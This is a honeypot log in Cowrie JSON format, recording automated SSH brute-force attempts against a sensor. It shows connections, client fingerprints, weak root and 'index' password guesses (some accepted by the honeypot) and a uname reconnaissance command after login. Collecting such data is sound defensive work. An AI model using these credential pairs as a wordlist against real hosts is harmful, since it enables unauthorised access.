{"eventid":"cowrie.login.failed","username":"index","password":"1qazxsw2","message":"login attempt [index/1qazxsw2] failed","sensor":"my-vps","timestamp":"2025-08-28T09:40:07.620712Z","src_ip":"185.93.89.7","session":"2d0af2031a81"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:08.640720Z","src_ip":"185.93.89.7","session":"2d0af2031a81"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:10.984927Z","src_ip":"164.92.65.236","session":"6b8c6bfce278"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37364,"dst_ip":"1.2.3.4","dst_port":22,"session":"03cf09dadaad","protocol":"ssh","message":"New connection: 51.79.164.132:37364 (1.2.3.4:22) [session: 03cf09dadaad]","sensor":"my-vps","timestamp":"2025-08-28T09:40:24.684726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:40:24.788499Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:40:25.274959Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:40:26.812408Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:40:27.933437Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:40:27.934149Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:28.353099Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:28.354172Z","src_ip":"51.79.164.132","session":"03cf09dadaad"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49242,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f30fdfb8b38","protocol":"ssh","message":"New connection: 185.93.89.7:49242 (1.2.3.4:22) [session: 1f30fdfb8b38]","sensor":"my-vps","timestamp":"2025-08-28T09:40:32.609656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:40:32.610681Z","src_ip":"185.93.89.7","session":"1f30fdfb8b38"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:40:32.627663Z","src_ip":"185.93.89.7","session":"1f30fdfb8b38"}
{"eventid":"cowrie.login.failed","username":"index","password":"12344321","message":"login attempt [index/12344321] failed","sensor":"my-vps","timestamp":"2025-08-28T09:40:32.681000Z","src_ip":"185.93.89.7","session":"1f30fdfb8b38"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:33.712032Z","src_ip":"185.93.89.7","session":"1f30fdfb8b38"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58898,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f731f76a48b","protocol":"ssh","message":"New connection: 51.79.164.132:58898 (1.2.3.4:22) [session: 5f731f76a48b]","sensor":"my-vps","timestamp":"2025-08-28T09:40:50.800017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:40:50.921692Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:40:51.619783Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:40:53.452397Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:40:54.546427Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:40:54.547153Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:54.729793Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:54.730992Z","src_ip":"51.79.164.132","session":"5f731f76a48b"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41928,"dst_ip":"1.2.3.4","dst_port":22,"session":"a779fb638c8a","protocol":"ssh","message":"New connection: 185.93.89.7:41928 (1.2.3.4:22) [session: a779fb638c8a]","sensor":"my-vps","timestamp":"2025-08-28T09:40:56.725154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:40:56.726183Z","src_ip":"185.93.89.7","session":"a779fb638c8a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:40:56.744284Z","src_ip":"185.93.89.7","session":"a779fb638c8a"}
{"eventid":"cowrie.login.failed","username":"index","password":"11111","message":"login attempt [index/11111] failed","sensor":"my-vps","timestamp":"2025-08-28T09:40:56.781598Z","src_ip":"185.93.89.7","session":"a779fb638c8a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:57.801493Z","src_ip":"185.93.89.7","session":"a779fb638c8a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45946,"dst_ip":"1.2.3.4","dst_port":22,"session":"f22253f0c731","protocol":"ssh","message":"New connection: 51.79.164.132:45946 (1.2.3.4:22) [session: f22253f0c731]","sensor":"my-vps","timestamp":"2025-08-28T09:41:17.097024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:41:17.284532Z","src_ip":"51.79.164.132","session":"f22253f0c731"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:41:17.988519Z","src_ip":"51.79.164.132","session":"f22253f0c731"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T09:41:19.594545Z","src_ip":"51.79.164.132","session":"f22253f0c731"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47712,"dst_ip":"1.2.3.4","dst_port":22,"session":"b97ce92fe874","protocol":"ssh","message":"New connection: 185.93.89.7:47712 (1.2.3.4:22) [session: b97ce92fe874]","sensor":"my-vps","timestamp":"2025-08-28T09:41:20.731205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:41:20.735923Z","src_ip":"185.93.89.7","session":"b97ce92fe874"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:41:20.755654Z","src_ip":"185.93.89.7","session":"b97ce92fe874"}
{"eventid":"cowrie.login.failed","username":"index","password":"abcdefg","message":"login attempt [index/abcdefg] failed","sensor":"my-vps","timestamp":"2025-08-28T09:41:20.816847Z","src_ip":"185.93.89.7","session":"b97ce92fe874"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:20.892673Z","src_ip":"51.79.164.132","session":"f22253f0c731"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:21.836844Z","src_ip":"185.93.89.7","session":"b97ce92fe874"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58154,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce7c64cd3f49","protocol":"ssh","message":"New connection: 51.79.164.132:58154 (1.2.3.4:22) [session: ce7c64cd3f49]","sensor":"my-vps","timestamp":"2025-08-28T09:41:43.237410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:41:43.415220Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:41:43.887223Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:41:45.408516Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60472,"dst_ip":"1.2.3.4","dst_port":22,"session":"add2a04025f5","protocol":"ssh","message":"New connection: 185.93.89.7:60472 (1.2.3.4:22) [session: add2a04025f5]","sensor":"my-vps","timestamp":"2025-08-28T09:41:45.968976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:41:45.973494Z","src_ip":"185.93.89.7","session":"add2a04025f5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:41:45.988009Z","src_ip":"185.93.89.7","session":"add2a04025f5"}
{"eventid":"cowrie.login.failed","username":"index","password":"12qwaszx","message":"login attempt [index/12qwaszx] failed","sensor":"my-vps","timestamp":"2025-08-28T09:41:46.043819Z","src_ip":"185.93.89.7","session":"add2a04025f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:41:46.072026Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:41:46.072825Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:46.719312Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:46.720359Z","src_ip":"51.79.164.132","session":"ce7c64cd3f49"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:47.122332Z","src_ip":"185.93.89.7","session":"add2a04025f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56516,"dst_ip":"1.2.3.4","dst_port":22,"session":"22a73a728571","protocol":"ssh","message":"New connection: 212.227.235.229:56516 (1.2.3.4:22) [session: 22a73a728571]","sensor":"my-vps","timestamp":"2025-08-28T09:41:56.619973Z"}
